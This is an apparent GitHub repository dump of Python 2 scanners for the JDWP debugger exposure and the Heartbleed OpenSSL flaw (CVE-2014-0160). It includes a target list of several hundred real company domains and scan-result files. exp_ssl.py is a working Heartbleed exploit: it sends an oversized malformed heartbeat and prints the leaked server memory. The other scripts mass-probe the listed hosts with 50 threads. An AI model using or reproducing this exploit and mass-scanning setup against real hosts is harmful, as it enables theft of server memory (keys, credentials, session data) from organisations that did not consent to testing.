├── jdwp ├── __init__.py ├── jdwp.txt ├── __init__.pyc ├── jdwpshellifier.pyc ├── jdwpscanner.py ├── host.txt └── jdwpshellifier.py ├── sslchecker ├── __init__.py ├── hb.txt ├── __init__.pyc ├── heartbleed_scanner.pyc ├── heartbleed_scanner.py ├── exp_ssl.py └── host.txt └── README.md /jdwp/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /jdwp/jdwp.txt: -------------------------------------------------------------------------------- 1 | [JDWP Scan]Scan 749 hosts, Find 0 jdwp vul 2 | 3 | -------------------------------------------------------------------------------- /sslchecker/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | -------------------------------------------------------------------------------- /sslchecker/hb.txt: -------------------------------------------------------------------------------- 1 | [HeartBleed Scan]Scan 749 hosts, Find 0 heartbleed vul 2 | 3 | -------------------------------------------------------------------------------- /jdwp/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/jdwp/__init__.pyc -------------------------------------------------------------------------------- /jdwp/jdwpshellifier.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/jdwp/jdwpshellifier.pyc -------------------------------------------------------------------------------- /sslchecker/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/sslchecker/__init__.pyc 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ops_scanner 2 | 搜集和定制化一些运维安全漏洞扫描脚本 3 | 4 | ####sslcheck 5 | heartbleed扫描 6 | ####jdwp 7 | jdwp安全扫描 8 | -------------------------------------------------------------------------------- /sslchecker/heartbleed_scanner.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LeoHuang2015/ops_scanner/HEAD/sslchecker/heartbleed_scanner.pyc -------------------------------------------------------------------------------- /jdwp/jdwpscanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """A quick scanner for JDWP(java debugger) vulnerability """ 4 | 5 | import socket 6 | import time 7 | import struct 8 | import urllib 9 | import argparse 10 | import select 11 | import signal 12 | import threading 13 | from multiprocessing.dummy import Pool 14 | from jdwpshellifier import JDWPClient 15 | 16 | lock = threading.Lock() 17 | threadpool = Pool(processes=50) 18 | socket.setdefaulttimeout(5) 19 | scan_results = [] 20 | 21 | def signal_handler(signal, frame): 22 | print "Ctrl+C pressed.. aborting..." 
23 | threadpool.terminate() 24 | threadpool.done = True 25 | 26 | def handle_result(host, port, result): 27 | tm = time.time() 28 | with lock: 29 | scan_results.append([host, port, result]) 30 | 31 | 32 | 33 | def jdwp_connect_check(*kw): 34 | 35 | result = False 36 | retcode = 0 37 | 38 | port = 8000 39 | #print len(kw), len(*kw), kw 40 | if len(*kw) == 1: 41 | host = kw[0][0] 42 | elif len(*kw) == 2: 43 | host, port = kw[0][0], int(kw[0][1]) 44 | else: 45 | print "get para error" 46 | 47 | try: 48 | cli = JDWPClient(host, port) 49 | cli.start() 50 | print "connect target:", host, port 51 | result = True 52 | raise KeyboardInterrupt 53 | 54 | except KeyboardInterrupt: 55 | pass 56 | 57 | except socket.timeout, e: 58 | print "[-] Timeout: %s" %(e) 59 | 60 | except Exception, e: 61 | print ("[-] Exception: %s" % e) 62 | 63 | finally: 64 | try: 65 | cli.leave() 66 | except: 67 | pass 68 | 69 | handle_result(host, port, result) 70 | return result 71 | 72 | 73 | def jdwp_file_check(check_file, result_file = None): 74 | port = 8000 75 | 76 | scan_list = [] 77 | 78 | with open(check_file) as f: 79 | for line in f: 80 | line = line.strip() 81 | if not line: 82 | continue 83 | if ":" in line: 84 | host, port = line.split(":") 85 | elif "\t" in line: 86 | host, port = line.split("\t") 87 | elif " " in line: 88 | host, port = line.split(" ") 89 | else: 90 | host = line 91 | 92 | scan_list.append([host, port]) 93 | 94 | task = threadpool.map(jdwp_connect_check, scan_list) 95 | 96 | threadpool.close() 97 | threadpool.join() 98 | 99 | vul_results = [] 100 | for x in scan_results: 101 | print x 102 | if x[2]: 103 | vul_results.append(x) 104 | 105 | if result_file: 106 | with open(result_file, 'w') as f: 107 | f.write("[JDWP Scan]Scan %d hosts, Find %d jdwp vul\n\n" % (len(scan_results), len(vul_results))) 108 | for x in vul_results: 109 | h, p, r = x 110 | f.write("%s %s\n" %(h, p)) 111 | 112 | if __name__ == '__main__': 113 | 114 | 115 | #target, port = "10.240.137.145", 443 
116 | #jdwp_connect_check([target, port]) 117 | 118 | input_file = "host.txt" 119 | output_file = "jdwp.txt" 120 | 121 | jdwp_file_check(input_file, output_file) -------------------------------------------------------------------------------- /sslchecker/heartbleed_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """A quick scanner for SSL heartbleed vulnerability (CVE-2014-0160)""" 4 | 5 | import os 6 | import struct 7 | import socket 8 | import time 9 | import select 10 | import signal 11 | import threading 12 | from multiprocessing.dummy import Pool 13 | 14 | lock = threading.Lock() 15 | scan_results = [] 16 | threadpool = Pool(processes=50) 17 | 18 | 19 | def signal_handler(signal, frame): 20 | print "Ctrl+C pressed.. aborting..." 21 | threadpool.terminate() 22 | threadpool.done = True 23 | 24 | 25 | def h2bin(x): 26 | ''' 27 | "16 03 03 00 dc 01 00 00 d8 03 03 53" --> '\x16\x03\x03\x00\xdc\x01\x00\x00\xd8\x03\x03S' 28 | ''' 29 | return x.replace(' ', '').replace('\n', '').decode('hex') 30 | 31 | #tls clienthello package 32 | hello = h2bin(''' 33 | 16 03 03 00 dc 01 00 00 d8 03 03 53 34 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 35 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 36 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 37 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 38 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 39 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 40 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 41 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 42 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 43 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 44 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 45 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 46 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 47 | 00 0f 00 01 01 48 | ''') 49 | 50 | def recvall(s, length, timeout=5): 51 | endtime = time.time() + 
timeout 52 | rdata = '' 53 | remain = length 54 | while remain > 0: 55 | rtime = endtime - time.time() 56 | if rtime < 0: 57 | return None 58 | r, w, e = select.select([s], [], [], 5) 59 | if s in r: 60 | try: 61 | data = s.recv(remain) 62 | except Exception, e: 63 | return None 64 | # EOF? 65 | if not data: 66 | return None 67 | rdata += data 68 | remain -= len(data) 69 | return rdata 70 | 71 | 72 | def recvmsg(s): 73 | hdr = recvall(s, 5) 74 | 75 | # confirm Server Hello 76 | if hdr is None: 77 | return None, None, None 78 | 79 | # C ---- [big-edition] + [unsigned char] + [unsigned short] + [unsigned short] 80 | # Python ---- [big-edition] + integer + integer + integer 81 | # [Content Type] + [Version] + [Length] 82 | typ, ver, ln = struct.unpack('>BHH', hdr) 83 | 84 | pay = recvall(s, ln, 10) 85 | if pay is None: 86 | return None, None, None 87 | return typ, ver, pay 88 | 89 | def hit_hb(s): 90 | while True: 91 | 92 | # TLSv1.1 Record Layer: Encrypted Heartbeat 93 | # Content Type: Heartbeat (24) 94 | # Version: TLS 1.1 (0x0302) 95 | # Length: 19 96 | # Encrypted Heartbeat Message 97 | typ, ver, pay = recvmsg(s) 98 | if typ is None: 99 | return False 100 | 101 | if typ == 24: 102 | return True 103 | 104 | if typ == 21: 105 | return False 106 | 107 | def hexdump(s): 108 | for b in xrange(0, len(s), 16): 109 | lin = [c for c in s[b : b + 16]] 110 | hxdat = ' '.join('%02X' % ord(c) for c in lin) 111 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin) 112 | print ' %04x: %-48s %s' % (b, hxdat, pdat) 113 | print 114 | 115 | 116 | def unpack_handshake(pay): 117 | """ 118 | Unpack the SSL handshake in Multiple Handshake Message 119 | """ 120 | paylen = len(pay) 121 | offset = 0 122 | payarr = [] 123 | 124 | while offset < paylen: 125 | h = pay[offset:offset + 4] 126 | t, l24 = struct.unpack('>B3s', h) 127 | l = struct.unpack('>I', '\x00' + l24)[0] 128 | payarr.append(( 129 | t, 130 | l, 131 | pay[offset+4:offset+4+l] 132 | )) 133 | offset = offset+l+4 134 | return payarr 135 | 136 | def is_vulnerable(host, timeout, port=443): 137 | """ Check if remote host is vulnerable to heartbleed 138 | 139 | Returns: 140 | None -- If remote host has no ssl 141 | False -- Remote host has ssl but likely not vulnerable 142 | True -- Remote host might be vulnerable 143 | """ 144 | 145 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 146 | s.settimeout(int(timeout)) 147 | 148 | #print "[x]host, port", host, port, "---------" 149 | try: 150 | s.connect((host, int(port))) 151 | except Exception, e: 152 | return None 153 | 154 | # 发送 clienthello 155 | s.send(hello) 156 | 157 | # 等待返回 158 | while True: 159 | typ, ver, pay = recvmsg(s) 160 | if typ is None: 161 | return None 162 | 163 | if typ == 22: 164 | payarr = unpack_handshake(pay) 165 | # Look for server hello done message. 166 | finddone = [t for t, l, p in payarr if t == 14] 167 | if len(finddone) > 0: 168 | break 169 | 170 | 171 | # OpenSSL responds with records of length 0x4000. It starts with 3 bytes 172 | # (length, response type) and ends with a 16 byte padding. If the payload is 173 | # too small, OpenSSL buffers it and this will cause issues with repeated 174 | # heartbeat requests. Therefore request a payload that fits exactly in four 175 | # records (0x4000 * 4 - 3 - 16 = 0xffed). 
176 | #''' 177 | ver_chr = chr(ver&0xff) 178 | #hb = h2bin("18 03") + ver_chr + h2bin("40 00 01 3f fd") + "\x01"*16381 179 | #hb += h2bin("18 03") + ver_chr + h2bin("00 03 01 00 00") 180 | hb = h2bin("18 03") + ver_chr + h2bin("00 03 01 40 00") 181 | #''' 182 | 183 | """ 184 | hb = h2bin(''' 185 | 18 03 03 00 03 186 | 01 40 00 187 | ''') 188 | #""" 189 | 190 | 191 | s.send(hb) 192 | 193 | return hit_hb(s) 194 | 195 | 196 | def scan_host(kw): 197 | """ Scans a single host, logs into 198 | 199 | Returns: 200 | list(timestamp, ipaddress, vulnerabilitystatus) 201 | """ 202 | port = 443 203 | timeout = 5 204 | if len(kw) == 1: 205 | host = kw[0] 206 | print "xxxxxxxxxx", host, port 207 | elif len(kw) == 2: 208 | host, port = kw[0], int(kw[1]) 209 | elif len(kw) == 3: 210 | host, port, timeout = kw[0], int(kw[1]), kw[2] 211 | else: 212 | print "get para error" 213 | 214 | #print host, port, timeout 215 | 216 | result = is_vulnerable(host, timeout, port) 217 | 218 | handle_result(host, port, result) 219 | 220 | return result 221 | 222 | def handle_result(host, port, result): 223 | tm = time.time() 224 | with lock: 225 | scan_results.append([host, port, result]) 226 | 227 | 228 | def hb_file_check(check_file, result_file = None): 229 | scan_list = [] 230 | with open(check_file) as f: 231 | for line in f: 232 | port = 443 233 | line = line.strip() 234 | if not line: 235 | continue 236 | 237 | if ":" in line: 238 | host, port = line.split(":") 239 | elif "\t" in line: 240 | host, port = line.split("\t") 241 | elif " " in line: 242 | host, port = line.split(" ") 243 | else: 244 | host = line 245 | 246 | scan_list.append([host, port]) 247 | 248 | task = threadpool.map(scan_host, scan_list) 249 | 250 | threadpool.close() 251 | threadpool.join() 252 | 253 | vul_results = [] 254 | for x in scan_results: 255 | #print x 256 | if x[2]: 257 | vul_results.append(x) 258 | 259 | if result_file: 260 | with open(result_file, 'w') as f: 261 | f.write("[HeartBleed Scan]Scan %d hosts, Find 
%d heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 262 | for x in vul_results: 263 | h, p, r = x 264 | f.write("%s %s\n" %(h, p)) 265 | 266 | def hb_blind_check(check_file, result_file = None): 267 | '''scan default port''' 268 | port_list = [25, 269 | 465, 270 | 110, 271 | 995, 272 | 143, 273 | 993, 994, 274 | 80, 8080, 275 | 443, 8443, 276 | 1194, 277 | 5988, 278 | 5989, 279 | 5990, 280 | 6443, 281 | 6771, 282 | 6789, 283 | 5443] 284 | 285 | scan_list = [] 286 | 287 | with open(check_file) as f: 288 | for line in f: 289 | host = line.strip() 290 | if not host: 291 | continue 292 | for port in port_list: 293 | scan_list.append([host, port]) 294 | 295 | 296 | task = threadpool.map(scan_host, scan_list) 297 | 298 | threadpool.close() 299 | threadpool.join() 300 | 301 | vul_results = [] 302 | for x in scan_results: 303 | #print x 304 | if x[2]: 305 | vul_results.append(x) 306 | 307 | if result_file: 308 | with open(result_file, 'w') as f: 309 | f.write("[HeartBleed Scan]Scan %d hosts, Find %d heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 310 | for x in vul_results: 311 | h, p, r = x 312 | f.write("%s %s\n" %(h, p)) 313 | 314 | 315 | if __name__ == '__main__': 316 | 317 | signal.signal(signal.SIGINT, signal_handler) 318 | 319 | 320 | input_file = "host.txt" 321 | result_file = "hb.txt" 322 | hb_file_check(input_file, result_file) 323 | 324 | input_file = "../test/only_host.txt" 325 | #hb_blind_check(input_file, result_file) 326 | -------------------------------------------------------------------------------- /sslchecker/exp_ssl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """A quick scanner for SSL heartbleed vulnerability (CVE-2014-0160)""" 4 | import sys 5 | import os 6 | import struct 7 | import socket 8 | import time 9 | import select 10 | import signal 11 | import threading 12 | from multiprocessing.dummy import Pool 13 | 14 | lock = 
threading.Lock() 15 | scan_results = [] 16 | threadpool = Pool(processes=50) 17 | 18 | 19 | def signal_handler(signal, frame): 20 | print "Ctrl+C pressed.. aborting..." 21 | threadpool.terminate() 22 | threadpool.done = True 23 | 24 | 25 | def h2bin(x): 26 | ''' 27 | "16 03 03 00 dc 01 00 00 d8 03 03 53" --> '\x16\x03\x03\x00\xdc\x01\x00\x00\xd8\x03\x03S' 28 | ''' 29 | return x.replace(' ', '').replace('\n', '').decode('hex') 30 | 31 | #tls clienthello package 32 | hello = h2bin(''' 33 | 16 03 03 00 dc 01 00 00 d8 03 03 53 34 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 35 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 36 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 37 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 38 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 39 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 40 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 41 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 42 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 43 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 44 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 45 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 46 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 47 | 00 0f 00 01 01 48 | ''') 49 | 50 | def recvall(s, length, timeout=5): 51 | endtime = time.time() + timeout 52 | rdata = '' 53 | remain = length 54 | while remain > 0: 55 | rtime = endtime - time.time() 56 | if rtime < 0: 57 | return None 58 | r, w, e = select.select([s], [], [], 5) 59 | if s in r: 60 | try: 61 | data = s.recv(remain) 62 | except Exception, e: 63 | return None 64 | # EOF? 
65 | if not data: 66 | return None 67 | rdata += data 68 | remain -= len(data) 69 | return rdata 70 | 71 | 72 | def recvmsg(s): 73 | hdr = recvall(s, 5) 74 | 75 | # confirm Server Hello 76 | if hdr is None: 77 | return None, None, None 78 | 79 | # C ---- [big-edition] + [unsigned char] + [unsigned short] + [unsigned short] 80 | # Python ---- [big-edition] + integer + integer + integer 81 | # [Content Type] + [Version] + [Length] 82 | typ, ver, ln = struct.unpack('>BHH', hdr) 83 | 84 | pay = recvall(s, ln, 10) 85 | if pay is None: 86 | return None, None, None 87 | return typ, ver, pay 88 | 89 | def hit_hb(s): 90 | while True: 91 | 92 | # TLSv1.1 Record Layer: Encrypted Heartbeat 93 | # Content Type: Heartbeat (24) 94 | # Version: TLS 1.1 (0x0302) 95 | # Length: 19 96 | # Encrypted Heartbeat Message 97 | typ, ver, pay = recvmsg(s) 98 | if typ is None: 99 | return False 100 | 101 | if typ == 24: 102 | print 'Received heartbeat response:' 103 | hexdump(pay) 104 | if len(pay) > 3: 105 | print 'WARNING: server returned more data than it should - server is vulnerable!' 106 | #if opts.out is not None: 107 | # with open(opts.out, "a") as out: 108 | # out.write(pay) 109 | else: 110 | print 'Server processed malformed heartbeat, but did not return any extra data.' 111 | return True 112 | 113 | if typ == 21: 114 | return False 115 | 116 | def hexdump(s): 117 | pdat = '' 118 | for b in xrange(0, len(s), 64): 119 | lin = [c for c in s[b : b + 16]] 120 | pdat += ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) 121 | 122 | print '%s' % (pdat.replace('......', ''),) 123 | print 124 | 125 | ''' 126 | def hexdump(s): 127 | for b in xrange(0, len(s), 16): 128 | lin = [c for c in s[b : b + 16]] 129 | hxdat = ' '.join('%02X' % ord(c) for c in lin) 130 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin) 131 | print ' %04x: %-48s %s' % (b, hxdat, pdat) 132 | print 133 | ''' 134 | 135 | def unpack_handshake(pay): 136 | """ 137 | Unpack the SSL handshake in Multiple Handshake Message 138 | """ 139 | paylen = len(pay) 140 | offset = 0 141 | payarr = [] 142 | 143 | while offset < paylen: 144 | h = pay[offset:offset + 4] 145 | t, l24 = struct.unpack('>B3s', h) 146 | l = struct.unpack('>I', '\x00' + l24)[0] 147 | payarr.append(( 148 | t, 149 | l, 150 | pay[offset+4:offset+4+l] 151 | )) 152 | offset = offset+l+4 153 | return payarr 154 | 155 | def is_vulnerable(host, timeout, port=443): 156 | """ Check if remote host is vulnerable to heartbleed 157 | 158 | Returns: 159 | None -- If remote host has no ssl 160 | False -- Remote host has ssl but likely not vulnerable 161 | True -- Remote host might be vulnerable 162 | """ 163 | 164 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 165 | s.settimeout(int(timeout)) 166 | 167 | #print "[x]host, port", host, port, "---------" 168 | try: 169 | s.connect((host, int(port))) 170 | except Exception, e: 171 | return None 172 | 173 | # 发送 clienthello 174 | s.send(hello) 175 | 176 | # 等待返回 177 | while True: 178 | typ, ver, pay = recvmsg(s) 179 | if typ is None: 180 | return None 181 | 182 | if typ == 22: 183 | payarr = unpack_handshake(pay) 184 | # Look for server hello done message. 185 | finddone = [t for t, l, p in payarr if t == 14] 186 | if len(finddone) > 0: 187 | break 188 | 189 | 190 | # OpenSSL responds with records of length 0x4000. It starts with 3 bytes 191 | # (length, response type) and ends with a 16 byte padding. If the payload is 192 | # too small, OpenSSL buffers it and this will cause issues with repeated 193 | # heartbeat requests. Therefore request a payload that fits exactly in four 194 | # records (0x4000 * 4 - 3 - 16 = 0xffed). 
195 | #''' 196 | ver_chr = chr(ver&0xff) 197 | #hb = h2bin("18 03") + ver_chr + h2bin("40 00 01 3f fd") + "\x01"*16381 198 | #hb += h2bin("18 03") + ver_chr + h2bin("00 03 01 00 00") 199 | hb = h2bin("18 03") + ver_chr + h2bin("00 03 01 40 00") 200 | #''' 201 | 202 | """ 203 | hb = h2bin(''' 204 | 18 03 03 00 03 205 | 01 40 00 206 | ''') 207 | #""" 208 | 209 | 210 | s.send(hb) 211 | 212 | return hit_hb(s) 213 | 214 | 215 | def scan_host(*kw): 216 | """ Scans a single host, logs into 217 | 218 | Returns: 219 | list(timestamp, ipaddress, vulnerabilitystatus) 220 | """ 221 | port = 443 222 | timeout = 5 223 | if len(*kw) == 1: 224 | host = kw[0][0] 225 | elif len(*kw) == 2: 226 | host, port = kw[0][0], int(kw[0][1]) 227 | elif len(*kw) == 3: 228 | host, port, timeout = kw[0][0], int(kw[0][1]), kw[0][1] 229 | else: 230 | print "get para error" 231 | 232 | #print host, port, timeout 233 | 234 | result = is_vulnerable(host, timeout, port) 235 | 236 | handle_result(host, port, result) 237 | 238 | return result 239 | 240 | def handle_result(host, port, result): 241 | tm = time.time() 242 | with lock: 243 | scan_results.append([host, port, result]) 244 | 245 | 246 | def hb_file_check(check_file, result_file = None): 247 | port = 443 248 | 249 | scan_list = [] 250 | 251 | with open(check_file) as f: 252 | for line in f: 253 | line = line.strip() 254 | if not line: 255 | continue 256 | if ":" in line: 257 | host, port = line.split(":") 258 | elif "\t" in line: 259 | host, port = line.split("\t") 260 | elif " " in line: 261 | host, port = line.split(" ") 262 | else: 263 | host = line 264 | 265 | scan_list.append([host, port]) 266 | 267 | task = threadpool.map(scan_host, scan_list) 268 | 269 | threadpool.close() 270 | threadpool.join() 271 | 272 | vul_results = [] 273 | for x in scan_results: 274 | #print x 275 | if x[2]: 276 | vul_results.append(x) 277 | 278 | if result_file: 279 | with open(result_file, 'w') as f: 280 | f.write("[HeartBleed Scan]Scan %d hosts, Find %d 
heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 281 | for x in vul_results: 282 | h, p, r = x 283 | f.write("%s %s\n" %(h, p)) 284 | 285 | def hb_blind_check(check_file, result_file = None): 286 | '''scan default port''' 287 | port_list = [25, 288 | 465, 289 | 110, 290 | 995, 291 | 143, 292 | 993, 994, 293 | 80, 8080, 294 | 443, 8443, 295 | 1194, 296 | 5988, 297 | 5989, 298 | 5990, 299 | 6443, 300 | 6771, 301 | 6789, 302 | 5443] 303 | 304 | scan_list = [] 305 | 306 | with open(check_file) as f: 307 | for line in f: 308 | host = line.strip() 309 | if not host: 310 | continue 311 | for port in port_list: 312 | scan_list.append([host, port]) 313 | 314 | 315 | task = threadpool.map(scan_host, scan_list) 316 | 317 | threadpool.close() 318 | threadpool.join() 319 | 320 | vul_results = [] 321 | for x in scan_results: 322 | #print x 323 | if x[2]: 324 | vul_results.append(x) 325 | 326 | if result_file: 327 | with open(result_file, 'w') as f: 328 | f.write("[HeartBleed Scan]Scan %d hosts, Find %d heartbleed vul\n\n" % (len(scan_results), len(vul_results))) 329 | for x in vul_results: 330 | h, p, r = x 331 | f.write("%s %s\n" %(h, p)) 332 | 333 | 334 | if __name__ == '__main__': 335 | 336 | signal.signal(signal.SIGINT, signal_handler) 337 | 338 | host = [sys.argv[1], sys.argv[2]] 339 | print host 340 | scan_host(host) 341 | -------------------------------------------------------------------------------- /jdwp/host.txt: -------------------------------------------------------------------------------- 1 | tencent.com 2 | baidu.com 3 | sina.com.cn 4 | sohu.com 5 | discuz.net 6 | rising.com.cn 7 | alibaba.com 8 | 360.cn 9 | maxthon.cn 10 | renren.com 11 | ifeng.com 12 | snda.com 13 | sdo.com 14 | sogou.com 15 | 163.com 16 | 9you.com 17 | duba.net 18 | xunlei.com 19 | ctrip.com 20 | 19lou.com 21 | shooter.cn 22 | verycd.com 23 | mop.com 24 | ourgame.com 25 | douban.com 26 | youku.com 27 | wanmei.com 28 | 39.net 29 | uc.cn 30 | pps.tv 31 | taobao.com 32 | blogbus.com 
33 | shopex.cn 34 | gtja.com 35 | alipay.com 36 | phpwind.net 37 | ftchinese.com 38 | lenovo.com 39 | www.net.cn 40 | 17173.com 41 | qiyi.com 42 | focus.cn 43 | chinaren.com 44 | tudou.com 45 | ztgame.com 46 | mtime.com 47 | tompda.com 48 | 51.com 49 | shandagames.com 50 | 4399.com 51 | jiepang.com 52 | it168.com 53 | huawei.com 54 | ku6.com 55 | dxy.cn 56 | xiami.com 57 | xywy.com 58 | qunar.com 59 | 7daysinn.cn 60 | phpcms.cn 61 | pipi.cn 62 | 58.com 63 | ganji.com 64 | chinaunix.net 65 | songtaste.com 66 | gaopeng.com 67 | duowan.com 68 | dnspod.cn 69 | tuchong.com 70 | yeepay.com 71 | the9.com 72 | ylmf.com 73 | cnzz.com 74 | lianzhong.com 75 | pindao.com 76 | jd.com 77 | dzwww.com 78 | 91wan.com 79 | guokr.com 80 | newegg.com.cn 81 | lashou.com 82 | 55tuan.com 83 | zhihu.com 84 | cnbeta.com 85 | pptv.com 86 | 9158.com 87 | ubox.cn 88 | hudong.com 89 | sangfor.com.cn 90 | vancl.com 91 | unnoo.com 92 | sucop.com 93 | bianfeng.com 94 | 6.cn 95 | elong.com 96 | 10jqka.com.cn 97 | anquanbao.com 98 | taomee.com 99 | yxlink.com 100 | php.net 101 | coremail.cn 102 | crucco.com 103 | zhenai.com 104 | dangdang.com 105 | aipai.com 106 | xiaomi.com 107 | joy.cn 108 | letao.com 109 | jingwei.com 110 | 51job.com 111 | changyou.com 112 | hada.me 113 | sf-express.com 114 | kingsoft.com 115 | leyou.com 116 | jiayuan.com 117 | soufun.com 118 | youtx.com 119 | lefeng.com 120 | yoybuy.com 121 | eset.com.cn 122 | 7k7k.com 123 | aqgj.cn 124 | guosen.com.cn 125 | ly.com 126 | tom.com 127 | cntv.cn 128 | veryeast.cn 129 | 12306.cn 130 | goodbaby.com 131 | cenwor.com 132 | tttuangou.net 133 | jiangmin.com 134 | yonyou.com 135 | ccw.com.cn 136 | vip.com 137 | ftsafe.com.cn 138 | csdn.net 139 | topsec.com.cn 140 | west263.com 141 | wanda.cn 142 | letv.com 143 | dns.com.cn 144 | diandian.com 145 | kugou.com 146 | syyx.com 147 | xiu.com 148 | baihe.com 149 | kingdee.com 150 | iboxpay.com 151 | 21cn.com 152 | nokia.com 153 | playcool.com 154 | duote.com 155 | wdlinux.cn 156 | yupoo.com 157 
| 263.net 158 | coo8.com 159 | 36kr.com 160 | dahe.cn 161 | yahoo.com 162 | cmseasy.cn 163 | tianya.cn 164 | suning.com 165 | zol.com.cn 166 | easybuy.com.cn 167 | gome.com.cn 168 | jiajia.me 169 | 5173.com 170 | baobeihuijia.com 171 | thinksky.hk 172 | neusoft.com 173 | gamemayi.com 174 | 51web.com 175 | dajie.com 176 | qianpin.com 177 | 2345.com 178 | 51cto.com 179 | guang.com 180 | lvmama.com 181 | happigo.com 182 | m18.com 183 | gooann.com 184 | lakala.com 185 | knownsec.com 186 | 99.com 187 | xd.com 188 | jiapin.com 189 | docin.com 190 | ip66.com 191 | tnyoo.com 192 | cwan.com 193 | dianping.com 194 | sclub.com.tw 195 | iciba.com 196 | xoyo.com 197 | ijinshan.com 198 | xueqiu.com 199 | chinacache.com 200 | hx168.com.cn 201 | 17sup.com 202 | mangocity.com 203 | shop.edu.cn 204 | tiexue.net 205 | cpic.com.cn 206 | venustech.com.cn 207 | huatu.com 208 | 178.com 209 | yihaodian.com 210 | house365.com 211 | 51greenorange.com 212 | 360shop.com.cn 213 | weibo.com 214 | touzhu.cn 215 | qiaogu.com 216 | zblogcn.com 217 | firefox.com.cn 218 | xcar.com.cn 219 | goldmail.cn 220 | trip8080.com 221 | baijob.com 222 | zhubajie.com 223 | acfun.tv 224 | qfpay.com 225 | xianguo.com 226 | tp-link.com.cn 227 | zhenpin.com 228 | hiall.com.cn 229 | 800app.com 230 | yuantiku.com 231 | redbaby.com.cn 232 | baixing.com 233 | 2cto.com 234 | linktrust.com.cn 235 | womai.com 236 | tuciabbay.com 237 | 1ting.com 238 | akcms.com 239 | kingosoft.com 240 | meitu.com 241 | meizu.com 242 | taocms.org 243 | 53kf.com 244 | oschina.net 245 | thinksns.com 246 | hxage.com 247 | moliyo.com 248 | 3158.cn 249 | oppo.com 250 | tuniu.com 251 | 3158.com 252 | meituan.com 253 | eversec.com.cn 254 | kuaibo.com 255 | cins.cn 256 | papa.me 257 | 591wed.com 258 | cheshi.com 259 | shopxx.net 260 | shopxx.net 261 | m1905.com 262 | argos.cn 263 | tgbus.com 264 | mafengwo.cn 265 | cnblogs.com 266 | fun.tv 267 | hupu.com 268 | sudu.cn 269 | feng.com 270 | nandu.com 271 | changba.com 272 | jinwankansha.com 273 | 
51bi.com 274 | chinaz.com 275 | umeng.com 276 | mogujie.com 277 | xinghua.org.cn 278 | coolping.com 279 | chinanetcenter.com 280 | iyiyun.com 281 | yunyun.com 282 | eguan.cn 283 | winenice.com 284 | opera.com 285 | zhimei.com 286 | tongbu.com 287 | haodf.com 288 | 3322.org 289 | dodonew.com 290 | lesuke.com 291 | iiyi.com 292 | sudytech.com 293 | 8684.cn 294 | bjsako.com 295 | newsmyshop.com 296 | tiancity.com 297 | looyu.com 298 | jollymm.com 299 | dopool.com 300 | fantong.com 301 | zhuna.cn 302 | secoo.com 303 | gamtee.com 304 | huanqiu.com 305 | kanglu.com 306 | wssys.net 307 | xinnet.com 308 | ebrun.com 309 | duoshuo.com 310 | bilibili.tv 311 | gfan.com 312 | pconline.com.cn 313 | 50cms.com 314 | trs.com.cn 315 | xdf.cn 316 | htinns.com 317 | wacai.com 318 | mplife.com 319 | donews.com 320 | qyer.com 321 | 9978.cn 322 | admin5.com 323 | etuan.com 324 | liepin.com 325 | 998.com 326 | eastmoney.com 327 | hc360.com 328 | welove520.com 329 | autonavi.com 330 | lusen.com 331 | ecisp.cn 332 | lightinthebox.com 333 | desdev.cn 334 | sgcc.com.cn 335 | mydrivers.com 336 | zte.com.cn 337 | 56.com 338 | mbaobao.com 339 | 